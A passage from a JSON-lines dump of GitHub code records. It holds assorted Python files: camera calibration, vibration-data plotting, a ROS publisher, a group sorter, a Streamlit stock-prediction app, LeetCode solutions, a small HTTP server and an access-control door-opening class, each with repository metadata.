....,(6,5,0)\nobjp = np.zeros((9*6,3), np.float32)\nobjp[:,:2] = np.mgrid[0:9,0:6].T.reshape(-1,2)\n\n\n# Arrays to store object points and image points from all the images.\nobjpoints = [] # 3d point in real world space\nimgpoints = [] # 2d points in image plane.\n\nimages = glob.glob('./*.png')\n\n\nfor fname in images:\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n # Find the chess board corners\n ret, corners = cv2.findChessboardCorners(gray, (9,6),None)\n\n # If found, add object points, image points (after refining them)\n if ret == True:\n objpoints.append(objp)\n\t\n corners2 = cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)\n imgpoints.append(corners2)\n\n # Draw and display the corners\n img = cv2.drawChessboardCorners(img, (9,6), corners2,ret)\n\nret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n \n\t\nprint(mtx) #camera matrix\nprint(dist) # distortion coefficient\n#cv2.imshow('img',img)\n\n\n#UNDISTORTION\n\ndata = {'camera_matrix': np.asarray(mtx,np.float32),\n 'dist_coeff': np.asarray(dist,np.float32)}\n\nwith open(\"calibration_matrix.yaml\", \"w\") as f:\n yaml.dump(data, f)\n\n\nwith open(\"calibration_matrix.yaml\", \"r\") as f:\n data = yaml.load(f)\n\nmtx = data['camera_matrix']\ndist = data['dist_coeff']\n\nNimg = cv2.imread('opencv_frame_30.png')\nh, w = Nimg.shape[:2]\nnewcameramtx, roi=cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),1,(w,h))\n# undistort\ndst = cv2.undistort(Nimg, mtx, dist, None, newcameramtx)\n# crop the image\n\ncv2.imwrite('calibresult.png',dst)\t\n#print(newcameramtx)\ncv2.imshow(\"undistorted\",dst)\n\ncv2.waitKey(0)\n \ncv2.destroyAllWindows()\n\n\n\n","repo_name":"AurornisTeam/Calibration","sub_path":"calibration/camera_calibration.py","file_name":"camera_calibration.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29907152904","text":"import pandas as pd\r\nimport openpyxl\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport numpy as np\r\n\r\n# 获取文件路径\r\nfile_path = 'root\\\\result\\\\targetline\\\\targetline_V2.xlsx'\r\n# 打开工作簿\r\nwb = openpyxl.load_workbook(file_path)\r\n# 遍历所有工作表\r\nfor sheet in wb.sheetnames:\r\n if sheet == \"Sheet\": # 如果该工作表名称为\"sheet\"\r\n wb.remove(wb['Sheet'])\r\n\r\n# 关闭工作簿\r\nwb.save('root\\\\result\\\\targetline\\\\targetline_V2.xlsx')\r\nwb.close()\r\n\r\n# 读取Excel文件\r\ndf = pd.read_excel('root\\\\result\\\\targetline\\\\targetline_V2.xlsx', sheet_name=None)\r\n\r\n# 定义要过滤的字符串\r\nstrings_to_filter = ['topX', 'topY', 'topZ']\r\n\r\n# 定义要合并的工作表类别\r\ncategories = ['9.62 order run up', '9.62 order run down', '26 order run down', '26 order run up']\r\n\r\n# 循环遍历每个工作表类别\r\nfor category in categories:\r\n # 循环遍历每个要过滤的字符串\r\n for string in strings_to_filter:\r\n # 过滤包含特定字符串的工作表\r\n filtered_sheets = [sheet for sheet in df.keys() if string in sheet and category in sheet]\r\n # 如果有匹配的工作表,则将它们合并为一个工作表\r\n if filtered_sheets:\r\n combined_sheet = pd.concat([df[sheet] for sheet in filtered_sheets])\r\n \r\n # 将合并后的工作表添加到DataFrame中\r\n df[f'{category} {string}'] = combined_sheet\r\n # 在新添加的列中填充原始工作表的名称\r\n df[f'{category} {string}']['Sheet Name'] = [sheet for sheet in filtered_sheets for i in range(len(df[sheet]))]\r\n # 将Sheet Name列重命名为Torque列\r\n df[f'{category} {string}'] = df[f'{category} {string}'].rename(columns={'Sheet Name': 'Torque'})\r\n # 替换特定字符串\r\n df[f'{category} {string}']['Torque'] = df[f'{category} {string}']['Torque'].replace(['9.62 order run up', '9.62 order run down', '26 order run down', '26 order run up', 'topX', 'topY', 'topZ','_','fra','f','me'], '', regex=True)\r\n \r\n # 删除原始工作表\r\n for sheet in filtered_sheets:\r\n del df[sheet]\r\n\r\n\r\n\r\n# 将结果写入新的Excel文件\r\nwith pd.ExcelWriter('root\\\\result\\\\targetline\\\\target group.xlsx') as writer:\r\n for sheet_name, sheet_df in df.items():\r\n sheet_df.to_excel(writer, sheet_name=sheet_name, index=False) \r\n\r\n\r\n\r\n\r\n# 读取Excel文件\r\ndfgroup = pd.read_excel('root\\\\result\\\\targetline\\\\target group.xlsx', sheet_name=None)\r\n\r\n\r\n# 遍历每个sheet\r\nfor sheet in dfgroup :\r\n\r\n # 提取数据,并计算新列\r\n data = dfgroup [sheet].set_index('input speed')\r\n\r\n # 创建包含所有唯一扭矩值的列表\r\n torques = sorted(data['Torque'].unique())\r\n\r\n # 创建一个空的DataFrame来存储每组扭矩值之间的相关系数\r\n correlations_df = pd.DataFrame(index=torques, columns=torques)\r\n\r\n # 针对每一组扭矩值,计算Target+5列与其它变量之间的相关系数,并更新correlations_df\r\n for i, torque1 in enumerate(torques):\r\n subset1 = data[data['Torque'] == torque1] \r\n \r\n for j, torque2 in enumerate(torques):\r\n subset2 = data[data['Torque'] == torque2] \r\n \r\n # 计算 subset1 和 subset2 中较短的长度\r\n min_length = min(len(subset1), len(subset2))\r\n end_speed = min(subset1.index[min_length-1], subset2.index[min_length-1])\r\n\r\n subset1_filtered = subset1[subset1.index < end_speed].reset_index(drop=True)\r\n subset2_filtered = subset2[subset2.index < end_speed].reset_index(drop=True)\r\n\r\n # 计算subset1和subset2之间Target+5列的相关性系数,并存储到correlations_df中\r\n corr_coef = subset1_filtered['target'].corr(subset2_filtered['target'], method='kendall')\r\n correlations_df.iat[i, j] = corr_coef\r\n correlations_df = correlations_df.astype(float)\r\n print(correlations_df)\r\n # 绘制矩阵图\r\n plt.figure(figsize=(24, 8))\r\n plt.subplot(1, 4, (2, 4))\r\n \r\n sns.lineplot(data=data, x='input speed', y='target+5', hue='Torque')\r\n plt.title(sheet)\r\n plt.legend(title=\"Legend\", loc=\"upper left\")\r\n plt.xlabel(\"Input Speed\")\r\n plt.ylabel(\"Housing Vibration dB[g]\")\r\n plt.xlim(0, 10000)\r\n plt.xticks(np.arange(0, 10001, 1000))\r\n plt.ylim(60, 166)\r\n plt.yticks(np.arange(60, 166, 10))\r\n plt.grid(color='#D3D3D3')\r\n plt.subplot(1, 4, 1)\r\n sns.heatmap(correlations_df, cmap='coolwarm', annot=True,\r\n xticklabels=torques, yticklabels=torques, vmin=0, vmax=1)\r\n plt.title('Correlation Matrix')\r\n \r\n\r\n # 保存图像\r\n plt.savefig(f\"root//result//visualization//07 dataoverview//dataoverview//05 torque correlation//{sheet}.png\")\r\n \r\n # 关闭图像,以便下一个循环可以绘制一个新的图形并使用相同的名称\r\n plt.close()\r\n\r\n","repo_name":"aierlanjiu/Vibration-Test-Data-Summary","sub_path":"src/torque_corr.py","file_name":"torque_corr.py","file_ext":"py","file_size_in_byte":4967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7295739212","text":"#! /usr/bin/env python\n# coding:utf8\n\nimport rospy\nfrom custom_msgs.msg import Student\n\nif __name__ == '__main__':\n\n nodeName = \"publisher_node\"\n rospy.init_node(nodeName)\n\n topicName = \"/zcb01/topic\"\n pub = rospy.Publisher(topicName, Student, queue_size=1000)\n\n rate = rospy.Rate(2)\n msg = Student()\n idx = 0\n while not rospy.is_shutdown():\n msg.name = \"tom%d\" % idx\n msg.age = idx\n pub.publish(msg)\n\n idx += 1\n rate.sleep()\n\n\n","repo_name":"zzzcb/robot","sub_path":"06ros/ws02/first_ws/src/use_custom_msg_pkg/scripts/publisher_cus_msg.py","file_name":"publisher_cus_msg.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"22154123588","text":"import csv\nimport random\nfrom pathlib import Path\nfrom datetime import datetime\nfrom itertools import cycle\n\nPATH_INPUT_FOLDER = Path(__file__).parent / Path('input') \nPATH_OUTPUT_FOLDER = Path(__file__).parent / Path('output') \nPATH_PEOPLE = PATH_INPUT_FOLDER / 'people.csv'\n\nVERBOSE = True\n\nELDER = 'Elder'\nJOURNEYMAN = 'Journeyman'\nAPPRENTICE = 'Apprentice'\n\n# Define a class to represent people\nclass Person:\n def __init__(self, name, category):\n self.name = name\n self.category = category\n\n def __str__(self):\n return f\"Name: {self.name}, Category: {self.category}\"\n\n# Function to create a template CSV file if it doesn't exist\ndef create_template_csv():\n with open(PATH_PEOPLE, mode='w', newline='') as file:\n writer = csv.writer(file, delimiter=';')\n writer.writerow(['Name', 'Category'])\n writer.writerow(['Person1', ELDER])\n writer.writerow(['Person2', ELDER])\n writer.writerow(['Person3', ELDER])\n writer.writerow(['Person4', JOURNEYMAN])\n writer.writerow(['Person5', JOURNEYMAN])\n writer.writerow(['Person6', JOURNEYMAN])\n writer.writerow(['Person7', JOURNEYMAN])\n writer.writerow(['Person8', APPRENTICE])\n writer.writerow(['Person9', APPRENTICE])\n writer.writerow(['Person10', APPRENTICE])\n writer.writerow(['Person11', APPRENTICE])\n\n# Function to read the CSV file and return a list of dictionaries\ndef read_people_csv():\n people_list = []\n with open(PATH_PEOPLE, mode='r') as file:\n reader = csv.DictReader(file, delimiter=';')\n for row in reader:\n person = Person(row['Name'], row['Category'])\n people_list.append(person)\n return people_list\n\ndef print_groups(groups:list[list[Person]]):\n for i, group in enumerate(groups):\n print(f\"Group {i+1}: {[f'{person.name, person.category}' for person in group]}\")\n print(\"\")\n\n# Function to sort people into groups based on the given conditions\ndef sort_people_into_groups(people_list: list[Person]) -> list[list[Person]]:\n groups: list[list[Person]] = []\n shuffled_people_list = people_list.copy() # Create a copy of the original list\n random.shuffle(shuffled_people_list) # Shuffle the people list to ensure random selection\n\n # Make groups using elders\n for person in shuffled_people_list:\n if person.category == ELDER:\n groups.append([person])\n people_list.remove(person) # Remove the person from the original list\n\n if VERBOSE: print_groups(groups)\n\n # Make groups using apprentice, journeymen. prioritize for one of each here.\n for group in groups:\n shuffled_people_list = people_list.copy()\n random.shuffle(shuffled_people_list) # Shuffle the people list to ensure random selection\n for person in shuffled_people_list:\n categories_in_group = [person.category for person in group]\n if person.category == APPRENTICE and APPRENTICE not in categories_in_group:\n group.append(person)\n people_list.remove(person) # Remove the person from the original list\n elif person.category == JOURNEYMAN and JOURNEYMAN not in categories_in_group:\n group.append(person)\n people_list.remove(person) # Remove the person from the original list\n\n if len(group) == 3:\n break\n\n if VERBOSE: print_groups(groups)\n\n if VERBOSE: print(f\"Remaining: {[f'{person.name, person.category}' for person in people_list]}\")\n\n return groups\n\n# Function to fill remaining slots in groups with available people\ndef fill_remaining_slots(groups: list[list[Person]], people_list: list[Person]) -> list[list[Person]]:\n group_cycle = cycle(groups)\n for person in people_list:\n current_group = next(group_cycle)\n current_group.append(person)\n return groups\n\n# Function to write the sorted groups into a file in CSV format\ndef write_groups_to_file(groups: list[list[Person]]):\n current_datetime = datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n file_name = PATH_OUTPUT_FOLDER / f\"sorted_groups_{current_datetime}.txt\"\n with open(file_name, 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['Name', 'Category'])\n writer.writerow([])\n for i, group in enumerate(groups, start=1):\n writer.writerow([f\"Group {i}:\", ''])\n for person in group:\n writer.writerow([person.name, person.category])\n writer.writerow([]) # Add an empty row for separation between groups\n\ndef main():\n # Check if the people.csv file exists, if not, create a template\n if not PATH_PEOPLE.exists():\n create_template_csv()\n\n # Read the CSV file\n people_list = read_people_csv()\n\n # Sort people into groups based on the given conditions\n groups = sort_people_into_groups(people_list)\n\n # Fill the remaining slots in groups with available people\n groups = fill_remaining_slots(groups, people_list)\n\n # Print the final groups\n print_groups(groups)\n\n # Write the sorted groups to a file, dated in YYYY-MM-DD format\n write_groups_to_file(groups)\n\nif __name__ == \"__main__\":\n main()","repo_name":"shanedertrain/three_grouper","sub_path":"three_grouper.py","file_name":"three_grouper.py","file_ext":"py","file_size_in_byte":5216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20118057302","text":"''' Variable scope'''\n'''\na = 10\nb = 20\ndef f1():\n global c\n global a\n print(\"Print a inside 1: \", a)\n a = 15\n c = 30\n print(\"Print a inside 2: \", a)\n print(\"Print b inside 1: \", b)\n\n\nprint(\"Print a outside 1: \", a)\nf1()\nprint(\"Print a outside 2: \", a)\nprint(\"Print c outside 1: \", c)\n\n'''\n'''Types of arguments'''\n'''\ndef add1(a, b, c)\n ans = a+b+c\n print(ans)\n return ans\nadd1(10, 20, 30)\n\ndef add1(a, b, c)\n ans = a+b+c\n print(ans)\n return ans\nadd1(10, b=20, c=30)\nadd1(10, c=30, b=40)\n\ndef add1(a, b, c= 100)\n ans = a+b+c\n print(ans)\n return ans\nadd1(10, b=20, c=30)\nadd1(10, b=20)\n\n\n\ndef add1(*args):\n print(args)\n mul = 1\n for arg in args:\n mul = mul * arg\n ans = sum(args)\n print(ans, mul)\n return ans\n\nadd1(10, 20, 30)\n\ndef add1(args):\n print(args)\n mul = 1\n for arg in args:\n mul = mul * arg\n ans = sum(args)\n print(ans, mul)\n return ans\n\nn = input(\"Enter how many numbers to add\")\ninp_data = list()\nfor i in range(int(n)):\n inp_data.append(int(input(f\"Enter number {i+1} : \")))\n \nadd1(inp_data)\n\ndef add1(a,b,c,d):\n ans = a+b+c+d\n return ans\n\ninp_data = (10,20,30,40)\nres = add1(*inp_data)\nprint(res * res)\n'''\ndef add1(*args, **kwargs):\n print(args)\n print(kwargs)\n for k, v in kwargs.items():\n print(f\"{k} is {v}\")\n mul = 1\n for arg in args:\n mul = mul * arg\n ans = sum(args)\n print(ans, mul)\n return ans\n\nadd1(10, 20, 30, name='abcd', age=25, phone_no=2524214)\n\n\n\n\n\n\n\n\n\n \n","repo_name":"salvieknath18/python_work","sub_path":"teaching_work/function_lecture1.py","file_name":"function_lecture1.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"1432556122","text":"from ..Entities.Transaction import Transaction as Transaction\nfrom typing import List\nclass Block:\n def __init__ (self, timestamp: float, previous_block_hash: str, init_value:float, init_destination:str, tx_dataset:List[Transaction], block_nonce:int, block_hash:str):\n self.timestamp = timestamp\n self.previous_block_hash = previous_block_hash\n self.init_value = init_value\n self.init_destination = init_destination\n self.tx_dataset = tx_dataset\n self.block_nonce = block_nonce\n self.block_hash = block_hash\n","repo_name":"reislucas94/tcc2-centralized-cryptocurrency","sub_path":"Central/Entities/Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9943266885","text":"import streamlit\nimport yfinance\nimport plotly\nimport streamlit as st\nfrom datetime import date\nimport yfinance as yf\nfrom plotly import graph_objs as go\nimport SP500_data_downloader as SP\nfrom SP500_data_downloader import *\nimport Macrotrends_downloader as MT\nfrom Macrotrends_downloader import *\nfrom IPython.display import clear_output\nfrom pandas_datareader import DataReader\nfrom streamlit.errors import StreamlitAPIException\nimport predictions_STA_EMA as STA_EMA\nfrom predictions_STA_EMA import *\n\n\nst.markdown(\"

STOCK PREDICTION

\", unsafe_allow_html=True)\n\nst.markdown(\"\"\"\nDear user,\ndata are uploading and it may take a while... This process may take approximately 15 minutes. Thanks to data upload at the beginning, you can further change your analysis without any additional waiting.\n\"\"\")\n\nst.markdown(\"
Selection of data for analysis
\", unsafe_allow_html=True)\n\ntickers=SP500()\n\n#LOADING ONLY 9 TICKERS\n#@st.cache #LOADING ONLY 9 TICKERS\n#def load_data():\n# data = get_data_try()\n# return data\n\n\n\n#LOADING ALL TICKERS\n@st.cache #LOADING ALL TICKERS\ndef load_data():\n data = get_data_yahoo()\n return data\n\ndata=load_data()\n\n\nBEGINNING = \"2015-01-01\"\nTODAY = date.today().strftime(\"%Y-%m-%d\")\n\nst.write(\"Firstly, select a maximum of 4 shares.\")\n\ntry:\n selected_tickers = st.multiselect('Companies', tickers) #selecting tickers for analysis\n#Dataframes\n data_volume=pd.DataFrame(data.Volume[selected_tickers],columns=selected_tickers)\n data_volume.index = pd.to_datetime(data_volume.index)\n\n data_close=pd.DataFrame(data.Close[selected_tickers],columns=selected_tickers)\n data_close.index = pd.to_datetime(data_close.index)\n\n data_open=pd.DataFrame(data.Open[selected_tickers],columns=selected_tickers)\n data_open.index = pd.to_datetime(data_open.index)\nexcept KeyError:\n st.error('We are so sorry, you selected ticker, for which data are invalid. Please, select other ticker.')\n \n\n\n\nst.markdown(\"
Please, press the button to see if the analysis will continue to work correctly with the selected data.
\", unsafe_allow_html=True)\n\nif st.button('Click for check'):\n if len(selected_tickers) > 4:\n st.warning('You can select maximum 4 tickers for analysis. Please, reselect your tickers otherwise, the analysis may not be correct and some error may occur.')\n elif len(selected_tickers) <1:\n st.error('You must select at least 1 ticker.')\n else:\n st.write('With selected data, the analysis will work properly :-)')\n st.write(\"Your selected tickers are:\")\n st.write(', '.join(selected_tickers))\n\nst.markdown(\"
If you obrain a positive message, that analysis will work properly, you can proceed the analysis.
\", unsafe_allow_html=True)\n\nst.subheader('Financial data from Yahoo Finance')\n\nif st.button('Click for data and graphs'):\n #Data and graph for close prise\n col_close, col_close_t = st.columns([3, 2])\n\n col_close.subheader(\"Close price of the stocks\")\n col_close.line_chart(data_close)\n with st.expander(\"See explanation\"):\n st.write(\"\"\"\n The chart and the table above show the data for close price for selected stocks. Closing price denotes the price at the end of the trading day at which security was transacted. As it is not influenced by stock splits or cash/stock dividens, it is a feature investors look at the most often.\n \"\"\")\n\n col_close_t.subheader(\"Close price for selected stocks\")\n col_close_t.write(data_close)\n \n #Data and graph for open price\n col_close, col_close_t = st.columns([3, 2])\n\n col_close.subheader(\"Open price of the stocks\")\n col_close.line_chart(data_close)\n with st.expander(\"See explanation\"):\n st.write(\"\"\"\n The chart and the table above show the data for open price for selected stocks. Opening price refers to the price at which each stock is traded immediately after the stock exchange opens to trading. However, it is not the same as the closing price from previous trading day.\n \"\"\")\n\n col_close_t.subheader(\"Open price for selected stocks\")\n col_close_t.write(data_close)\n \n #Data and graph for volume\n col_close, col_close_t = st.columns([3, 2])\n\n col_close.subheader(\"Volume of the stocks\")\n col_close.line_chart(data_close)\n with st.expander(\"See explanation\"):\n st.write(\"\"\"\n The chart and the table above show the data of volume for selected stocks. In general, trading volume measures how much certain financial asset is traded during specific period. In case of stocks, it means number of shares traded. Trading volumes are associated with market strength and thus, investors consider observing volume patterns very useful.\n \"\"\")\n\n col_close_t.subheader(\"Volume for selected stocks\")\n col_close_t.write(data_close)\n\ndef macro_df():\n ratios=pd.DataFrame()\n for ticker in selected_tickers:\n rat=get_data_macro(ticker)\n rat=rat.set_index('field_name').T\n ratios2=pd.DataFrame(rat)\n ratios2.insert(0,'TICKER','')\n ratios2[\"TICKER\"] = ticker\n ratios=ratios.append(ratios2)\n #ratios.rename(columns={'field_name':'Ratio'}, inplace=True)\n return(ratios) \n \n#Ratios for selected tickers\nMT_data=macro_df()\nMT_data=pd.DataFrame(MT_data)\nMT_data_show = MT_data.astype(str)\nlist_of_ratios_with_T=MT_data_show.columns.to_list()\nlist_of_ratios=list_of_ratios_with_T[1:]\n#list_of_ratios=MT_data_show[\"Ratio\"].values.tolist()\n\nst.subheader('Ratios from Macrotrends')\ntry:\n what_ratio = st.radio(\n \"For what tickers do you want to see ratio?\",\n ('For all selected tickers', 'For one from selected tickers', 'For one from all tickers from S&P 500'))\n if what_ratio == 'For all selected tickers':\n st.write('Here you can see ratios for all selected tickers')\n st.write(MT_data_show)\n with st.expander(\"See definitions of ratios\"):\n with open('Ratios_def.txt') as f:\n for line in f:\n st.write(line)\n elif what_ratio=='For one from selected tickers':\n st.write('Please, select one ticker from previously selected tickers.')\n option = st.selectbox(\n 'Select to show ratios only for',\n (selected_tickers))\n st.write('You selected:', option)\n rat1=MT_data_show[MT_data_show[\"TICKER\"] ==option]\n rat2=rat1.astype(str)\n st.write(rat2)\n ratio_selected2=st.selectbox(\n 'What ratio are you interested to display?',\n (list_of_ratios))\n with st.expander(\"See definitions of ratios\"):\n with open('Ratios_def.txt') as f:\n for line in f:\n st.write(line)\n st.subheader(f'Data for ratio: {ratio_selected2}')\n df_rat_sel2=rat2[ratio_selected2]\n col_rat2, col_rat2_t = st.columns([4, 2])\n col_rat2.subheader(\"Graph\")\n col_rat2.line_chart(df_rat_sel2)\n col_rat2_t.subheader(\"Table\")\n col_rat2_t.write(df_rat_sel2)\n else:\n st.write('Please, select one ticker from S&P Tickers.')\n option2 = st.selectbox(\n 'Select to show ratios only for',\n (tickers))\n st.write('You selected:', option2)\n rat3=get_data_macro(option2)\n rat3=rat3.set_index('field_name').T\n rat4=pd.DataFrame(rat3)\n rat4=rat4.astype(str)\n st.dataframe(rat4)\n ratio_selected3=st.selectbox(\n 'What ratio are you interested to display?',\n (list_of_ratios))\n with st.expander(\"See definitions of ratios\"):\n with open('Ratios_def.txt') as f:\n for line in f:\n st.write(line)\n st.subheader(f'Data for ratio: {ratio_selected3}')\n df_rat_sel3=rat4[ratio_selected3]\n col_rat3, col_rat3_t = st.columns([4, 2])\n col_rat3.subheader(\"Graph\")\n col_rat3.line_chart(df_rat_sel3)\n col_rat3_t.subheader(\"Table\")\n col_rat3_t.write(df_rat_sel3)\nexcept StreamlitAPIException:\n st.error('We are so sorry, you selected ticker, for which data are invalid. Please, select other ticker.')\n \nst.subheader('Stock price and volume predictions')\n\nif st.button('Click for short term predictions'):\n bb=pd.DataFrame(data)\n #st.write(\",\".join((selected_tickers)))\n st.write(\"In the tables below, you are given short-term (one trading day ahead) predictions on Open price, Close price and Volume of selected ticker(s).\") \n st.write(\"The first table contains predictions obtained via Standard Averaging (STA). The key idea of this method is to use historical values within specific time window (in this prediction we use 100 days), average them and use the obtained value as prediction for the following day.\")\n st.write(pred_sta_app(selected_tickers, bb))\n st.write(\" \")\n st.write(\" \")\n st.write(\"The second table presents predictions coming from exponential averaging following Exponential Moving Average (EMA) methodology.\")\n st.write(pred_ema_app(selected_tickers,bb))\n st.write(\" \")\n st.write(\" \")\n #st.write(data_volume)\n #st.write(\" \")\n #st.write(\" \")\n #st.write(pd.DataFrame(data.Volume[selected_tickers][\"GE\"],columns=selected_tickers))\n #st.write(\" \")\n #st.write(\" \")\n #st.write(pd.DataFrame(data.Close))\n #st.write(data)\n\nst.subheader('Downloading data')\n\nst.markdown(\"
If you would like to create your own analysis, you can download data for S&P 500 market index from Yahoo Finance below.
\", unsafe_allow_html=True)\n\n@st.cache\ndef convert_df(df):\n return df.to_csv().encode('utf-8')\n\ndata_csv = convert_df(data)\n\nst.download_button(\n label=\"Download financial data\",\n data=data_csv,\n file_name='data.csv',\n mime='text/csv',\n )\n","repo_name":"AnnaBezu/Project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32119260961","text":"from typing import List\n\n\nclass Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n cur_idx = 0\n for num in nums:\n if num == 0:\n continue\n nums[cur_idx] = num\n cur_idx += 1\n while cur_idx < len(nums):\n nums[cur_idx] = 0\n cur_idx += 1\n # return nums\n\n\nif __name__ == '__main__':\n solution = Solution()\n nums = [0, 1, 0, 3, 12]\n print(solution.moveZeroes(nums))\n","repo_name":"ace7chan/leetcode-daily","sub_path":"code/202011/20201119_283_moveZeroes.py","file_name":"20201119_283_moveZeroes.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30857919954","text":"from logging import INFO, getLogger, StreamHandler, Formatter, FileHandler, DEBUG\nimport os\n\n\ndef setup_logger(file_name, modname=__name__):\n dir = os.path.dirname(file_name)\n if not os.path.isdir(dir):\n os.makedirs(dir)\n\n logger = getLogger(modname)\n logger.setLevel(DEBUG)\n\n sh = StreamHandler()\n sh.setLevel(DEBUG)\n formatter = Formatter(\n '%(levelname)s:%(filename)s:%(lineno)d:%(message)s')\n sh.setFormatter(formatter)\n logger.addHandler(sh)\n\n fh = FileHandler(file_name)\n fh.setLevel(INFO)\n fh_formatter = Formatter(\n '%(asctime)s:%(levelname)s:%(filename)s:%(lineno)d:%(message)s')\n fh.setFormatter(fh_formatter)\n logger.addHandler(fh)\n return logger\n\n\nif __name__ == '__main__':\n filepath = 'log/test/mkdir_test.log'\n logger = setup_logger(filepath)\n logger.debug('Log test')\n listed_markets = [{'name': 'BTC-PERP', 'ask': 100}]\n logger.info(listed_markets)\n","repo_name":"massun-onibakuchi/py-trader-v2","sub_path":"src/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23953749817","text":"from math import log\n\n\ndef primes(n):\n p = [1] * n\n p[0] = p[1] = 0\n\n i = 2\n while i < n:\n if p[i]:\n yield i\n for j in range(2 * i, n, i):\n p[j] = 0\n i += 1\n\n\nm = 2 * 10 ** 6\nprint(sum(primes(m)))\n","repo_name":"scottwillmoore/project-euler-solutions","sub_path":"p010.py","file_name":"p010.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12941008272","text":"from http.server import *\n\n\nclass myHandler(SimpleHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(bytes(\"hello, nikolay\", \"utf8\"))\n\n\n# configure server\nport = 8080\nserver_address = (\"127.0.0.1\", port)\nhttpd = HTTPServer(server_address, myHandler)\n\n# run server\nhttpd.serve_forever()\n","repo_name":"narlah/Pythonicas","sub_path":"MainTestingAreaPy/httpServer.py","file_name":"httpServer.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25672891156","text":"class Solution:\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n :type nums1: List[int]\n :type m: int\n :type nums2: List[int]\n :type n: int\n :rtype: void Do not return anything, modify nums1 in-place instead.\n \"\"\"\n last1 = m - 1\n last2 = n - 1\n last = m + n - 1\n while last2 >= 0:\n if last1 == -1:\n nums1[last] = nums2[last2]\n last2 -= 1\n else:\n if nums1[last1] >= nums2[last2]:\n nums1[last] = nums1[last1]\n last1 -= 1\n else:\n nums1[last] = nums2[last2]\n last2 -= 1\n last -= 1\n\n\n","repo_name":"turing4ever/codesnippets","sub_path":"leetcode/88.merge-sorted-array.python3.py","file_name":"88.merge-sorted-array.python3.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70377844392","text":"import win32com.client\nimport logging\nfrom models.control_point import ControlPoint\nfrom models.user import User\nfrom models.vector import Vector\nfrom services.service_interfaces import IAccessControlSystem\nfrom typing import Dict, Tuple, List\nfrom os import listdir\nfrom os.path import isfile, join\nimport datetime\nimport time\n\n\nclass AccessControlSystem(IAccessControlSystem):\n\n def __init__(self):\n FlexServ = win32com.client.Dispatch(\"FlexServer.FlexServerGlobal\")\n token = FlexServ.AuthenticateUser(\"admin\", \"admin\", False)\n self._FlexACS = FlexServ.GetObject(token, \"FlexACSModule.FlexACS\")\n self._FlexACS.ConnectAll(None, 0)\n self._FlexDB = FlexServ.GetObject(token, \"FlexDB.FlexDBModule\")\n self._path = \"D:\\\\Октаграм\\\\client_temp\\\\\"\n self._last_time_accessed = datetime.datetime.now() - datetime.timedelta(seconds=6)\n self._last_user_accessed = User('','', Vector(''))\n logger = logging.getLogger(__name__)\n logger.debug(\"FlexACS: {}\".format(str(self._FlexACS)))\n logger.debug(\"FlexDB: {}\".format(str(self._FlexDB)))\n\n def open_door(self, door: ControlPoint, user: User):\n try:\n self._FlexACS.FlexCommand(\n None, \"S-1-0581B9AD-5CDC-4d86-A328-0D94A615A418\", 10133)\n logger = logging.getLogger(__name__)\n logger.debug(self._last_time_accessed)\n logger.debug(datetime.datetime.now())\n logger.debug(datetime.datetime.now() - self._last_time_accessed)\n logger.debug((datetime.datetime.now() - self._last_time_accessed) > datetime.timedelta(seconds=5))\n logger.debug(self._last_user_accessed.key_id)\n logger.debug(self._last_user_accessed.key_id != user.key_id)\n if ((datetime.datetime.now() - self._last_time_accessed) > datetime.timedelta(seconds=5)) or (self._last_user_accessed.key_id != user.key_id):\n logger.info(\"Event put for user: \" + user.full_name)\n self._FlexDB.PutEvent(0, user.key_id,\n \"S-1-0581B9AD-5CDC-4d86-A328-0D94A615A418\", 289, 0,\n datetime.datetime.now()+datetime.timedelta(seconds=-time.timezone), '', None)\n self._last_user_accessed = user\n self._last_time_accessed = datetime.datetime.now()\n except Exception as e:\n logger = logging.getLogger(__name__)\n logger.exception(e)\n\n def has_access(self, door: ControlPoint, user: User) -> bool:\n try:\n users = self._FlexDB.GetUsers4Device(\"S-1-0581B9AD-5CDC-4d86-A328-0D94A615A418\")\n except Exception as e:\n logger = logging.getLogger(__name__)\n logger.exception(e)\n return False\n\n if not users:\n return False\n\n return user.key_id in (u.strSID for u 